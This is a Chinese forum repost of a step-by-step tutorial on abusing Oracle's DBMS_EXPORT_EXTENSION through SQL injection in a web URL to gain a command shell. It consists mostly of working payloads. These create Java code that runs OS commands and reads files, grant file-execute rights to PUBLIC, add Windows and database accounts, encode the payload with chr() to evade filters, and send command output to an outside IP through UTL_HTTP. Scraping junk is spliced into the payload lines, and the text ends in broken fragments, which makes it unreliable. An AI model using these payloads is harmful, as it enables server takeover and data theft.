
实例演示oracle注入获取cmdshell的全过程

发表于 2012-12-18 12:21:48 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
的形式即可。(用 " 'a'|| " 是为了让语句返回true值)
语句有点长,可能要用post提交。
以下是各个步骤:
1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
* g5 f3 P8 L. f% ~2 ]$ t8 c) h7 ?/xxx.jsp?id=1 and '1'<>'a'||(
/ \; O$ l3 P) j" P- _select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''. k" B5 U1 y4 i6 `1 o7 A' Y
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(4 J8 [- o$ N9 a9 k; x9 Z
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
0 h8 r# }  U! R- `& L+ p: g/ M}'''';END;'';END;--','SYS',0,'1',0) from dual   z0 u% v) O& r4 N" G
) , k0 p' q! i% K) f, v0 j0 o
------------------------ " D0 v( e# C" G+ J/ j) ~
如果url有长度限制,可以把readFile()函数块去掉,即:
/xxx.jsp?id=1 and '1'<>'a'||(
2 e! b% D3 p# Z8 r+ U0 Y: e6 g/ v& wselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''% {* t2 c  i" s2 }' L. _
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
) d8 n4 e6 }; u; Z  Bnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}  I$ C2 Q4 o6 s) J0 h4 r0 a# M& m
}'''';END;'';END;--','SYS',0,'1',0) from dual
/ m+ Z5 Q  M$ Y: a% W3 x. \, X) 3 F( O9 r/ `* x1 r+ S
同时把后面步骤提到的对readFile()的处理语句去掉。
------------------------------ - d6 ?6 v2 \: y  g
2.赋Java权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
3.创建函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''') K2 n4 `2 X6 K# h
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
- V1 B  c1 n% m. c! Kselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''4 Y' @- T0 o' p5 b# B% s
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual% n2 F4 H2 o, s* q! g& P$ c, o
4.赋public执行函数的权限
4 D, u9 O5 M, ~$ W  I" Vselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
/ h5 e& g. w1 c2 y' n) h5 Y$ lselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual5 [, U- C% Z4 b7 Z' A6 ?0 Q& ]4 n
5.测试上面的几步是否成功
& W- a4 O; b# H; ?and '1'<>'11'||(
4 O9 U+ ^( Y: s% f) J, Z& n# hselect  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
# _4 [/ S5 g+ s* p* z) / y! b: v% i. Q$ P' m* a
and '1'<>( * E1 n! Y: h+ _! f
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE' / L; P3 ]# f+ c* {+ e) \5 ]1 I
)
6.执行命令:
/xxx.jsp?id=1 and '1'<>( ( V7 _) G1 [5 G# L
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
) ' E. i& ~* u" o& M# c1 O3 j/ V0 }
/xxx.jsp?id=1 and '1'<>( 7 E3 }2 q4 J- F
select  sys.LinxReadFile('c:/boot.ini') from dual
)- R4 l% g- {8 |4 D
  
注意sys.LinxReadFile()返回的是varchar类型,不能用 "and 1<>" 代替 "and '1'<>"。
如果要查看运行结果可以用 union :
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual6 o' s+ Q* k3 t4 b' T+ B- F
或者用 UTL_HTTP.request():
8 Z+ l6 {8 ?( y! V# F7 U2 V4 I/xxx.jsp?id=1 and '1'<>(   |3 u6 r: n" t" p
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
" L6 @5 ], r, y: f)
% j" ~: i6 Z& q* \6 [: D$ W/xxx.jsp?id=1 and '1'<>( . \- _3 v' f- z% y
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual: D7 @0 a6 O: ^4 ?; ]
) 8 r3 ^, N% t8 ~, W  n. A+ E
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
--------------------
6.内部变化
通过以下命令可以查看all_objects表的改变:
0 X# P! L- \, u4 sselect  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'( y8 c" @. L7 U1 U$ Q9 K8 X
7.删除我们创建的函数(下面只 drop 了 LinxRunCMD,前面创建的 Java 源 LinxUtil 和函数 LinxReadFile 没有一起删除,用第6步的 all_objects 查询仍能看到):
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
- {* F# f/ ]0 _! _drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
. i5 ]' ?& ^: l1 ]% o==================================================== . v0 u+ K4 V8 J  ^% F
全文结束。谨以此文赠与我的朋友。
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
! c- A1 u% _4 s* I. p====================================================================== & K* F! S1 x' O9 C3 J; e& B
测试漏洞的另一方法:
创建oracle帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
: k8 C( A) i% Q  _/ h, Q" T6 xCREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual; T) e1 J) q7 B0 F& ~) b
即:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),. x" C8 e. V/ ~1 `8 R7 H
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
确定漏洞存在:
0 P: v+ I6 ~2 x9 ~$ T! a  h2 S8 `1<>( ; C& D4 b" ]; ~% O( `
select user_id from all_users where username='LINXSQL' / U4 M! c+ `! G6 Z- S
) 3 I& O8 H3 `- F2 w  o8 e
给linxsql连接权限:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
; r- l& _" l1 o6 }' ?2 uGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual * C/ B$ b* ~7 u0 E3 ?) M0 U
删除帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
: o4 c/ J8 Y8 [0 Q4 edrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual 4 X: O2 o+ u( R( j! c) J, A3 n% M
======================
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1";但它以 authid current_user 定义,权限是从调用者继承的,可能仅仅是public权限,作用似乎不大,真的要用的话可以考虑grant dba to 当前的User:
1.jsp?id=1 and '1'<>( $ D* P0 f0 X- x# }& s% E
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''% D" S# n: `7 B% r
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual9 z% O( t9 @2 _8 i
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE4 m0 h) G2 P5 q
 )7 l1 e6 d8 R6 t
